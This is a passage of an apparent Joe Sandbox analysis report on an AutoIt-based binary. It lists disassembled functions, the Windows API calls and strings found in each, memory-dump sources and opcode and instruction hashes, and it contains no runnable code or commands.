                          • Opcode Fuzzy Hash: 94d8c35a14993a5f23fb654ff8da6b6e6243461261430ef3ef80c8b9cafafce3
                          • Instruction Fuzzy Hash: 7701F731B06610EBCB00F76CA85FA9D33659B05750F504065F602572C3EE6C5D9286E7
                          Function 00798172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007D3018,007D305C), ref: 007981BF
                          • CloseHandle.KERNEL32 ref: 007981D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: \0}
                          • API String ID: 3712363035-1796552116
                          • Opcode ID: 3e06f57b887d4d4eca668d6d48309c49453150f9ee970c20ccd3610d421685cd
                          • Instruction ID: 093467c986b53ba450a028d33ca371846265aa7f1932682456498fd97b0d34e3
                          • Opcode Fuzzy Hash: 3e06f57b887d4d4eca668d6d48309c49453150f9ee970c20ccd3610d421685cd
                          • Instruction Fuzzy Hash: 63F05EB1641314BBF720A761AC49FB73B6DDB05750F008422BB08D51A2D67D8A0183BE
                          Function 0078747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: 3, 3, 16, 1
                          • API String ID: 176396367-3042988571
                          • Opcode ID: 03e8c4b3329bdddc055b49e66b239c2742bbd9b38d5ef9c8231579595139c034
                          • Instruction ID: a216f3a3e9f8479b3a38b0e73676a596183ce47250c07631584695c005ad2bc9
                          • Opcode Fuzzy Hash: 03e8c4b3329bdddc055b49e66b239c2742bbd9b38d5ef9c8231579595139c034
                          • Instruction Fuzzy Hash: 4AE02B422442B060923932B9ACC5A7F5689CFC5760734182FF9CAC2266EADCDDD1D3A0
                          Function 00760B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                          Download Yara Rule
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00760B23
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Message
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 2030045667-4017498283
                          • Opcode ID: 68469a1ab000984b30006d420c46b6badc0f6eab94aecc3c25a6c4a3427b05d0
                          • Instruction ID: 4d6644b7635bcca4fb9b49b0782a37d3ee0da2828f454b0d0c967f49848b4ab1
                          • Opcode Fuzzy Hash: 68469a1ab000984b30006d420c46b6badc0f6eab94aecc3c25a6c4a3427b05d0
                          • Instruction Fuzzy Hash: D0E0D831244318B6DA1137947C0BFC97B848F05B20F10446AFB88554C38AEA349006F9
                          Function 00720D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0071F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00720D71,?,?,?,0070100A), ref: 0071F7CE
                          • IsDebuggerPresent.KERNEL32(?,?,?,0070100A), ref: 00720D75
                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0070100A), ref: 00720D84
                          Strings
                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00720D7F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                          • API String ID: 55579361-631824599
                          • Opcode ID: f29998382c91e652c16dad16990121a8c80bb31b7b3dd1a875586ef778e368e6
                          • Instruction ID: 99a68a1f218288c8cdc85a82c839e0bf2a58d2bae5f49850e7525844b3621e12
                          • Opcode Fuzzy Hash: f29998382c91e652c16dad16990121a8c80bb31b7b3dd1a875586ef778e368e6
                          • Instruction Fuzzy Hash: 00E06D702013118BDB209FB8E8083427BE0BB00750F00893EE482C6692DBBCE4458BE1
                          Function 0071E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0071E3D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: 0%}$8%}
                          • API String ID: 1385522511-2688785392
                          • Opcode ID: f642bbd5c47ea6816f1ddd00b5b0d01a9769f73c86e008d6e278c9f1d701e7d2
                          • Instruction ID: 0a4def383946e59a06b7d36d1f2d692c29d79662ac50a2779ae418292758aed8
                          • Opcode Fuzzy Hash: f642bbd5c47ea6816f1ddd00b5b0d01a9769f73c86e008d6e278c9f1d701e7d2
                          • Instruction Fuzzy Hash: ADE08631419A24CBC704971CB85DEC83375BB55720B5052F7E923872D3DB3C689386A9
                          Function 0075D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LocalTime
                          • String ID: %.3d$X64
                          • API String ID: 481472006-1077770165
                          • Opcode ID: 6d90e8d5c912c073f3fc5a872004ec8e5df3380e0f34689db0b2ef727c569fc9
                          • Instruction ID: 8b46af6b1154d82e5235f85036528b7790f7dfcfb683b59993885076f2a355d0
                          • Opcode Fuzzy Hash: 6d90e8d5c912c073f3fc5a872004ec8e5df3380e0f34689db0b2ef727c569fc9
                          • Instruction Fuzzy Hash: D5D012B1C08148E9CB7097E0CC499F9B37CBB08302F508456FD0691040D6ACDD4CAB61
                          Function 00792356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0079236C
                          • PostMessageW.USER32(00000000), ref: 00792373
                            • Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 82aad4ed18a66b6b033e0f63d45de9f2b55826ec3905e50267d0dab51303d1d3
                          • Instruction ID: e0ccd6cefb0ab1fc4cf2c5ccd5152a93639d0a0b2a863df0c39432ebc31f2698
                          • Opcode Fuzzy Hash: 82aad4ed18a66b6b033e0f63d45de9f2b55826ec3905e50267d0dab51303d1d3
                          • Instruction Fuzzy Hash: 14D0C976381310BAEA65A7709C4FFC666249B04B10F11896A7646AA1D4C9A8B8128A58
                          Function 00792322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0079232C
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0079233F
                            • Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: b93fdab98c36926e02c0b8c5d03354e463c940a94061982454d6da25ac38e4df
                          • Instruction ID: 302a4534075deba0410599d960366077678e17f653b1ed1a674b18e21a90076e
                          • Opcode Fuzzy Hash: b93fdab98c36926e02c0b8c5d03354e463c940a94061982454d6da25ac38e4df
                          • Instruction Fuzzy Hash: C6D01276394310B7EA64B770DC4FFC67A249F00B10F11896B7746AA1D4C9F8B812CA58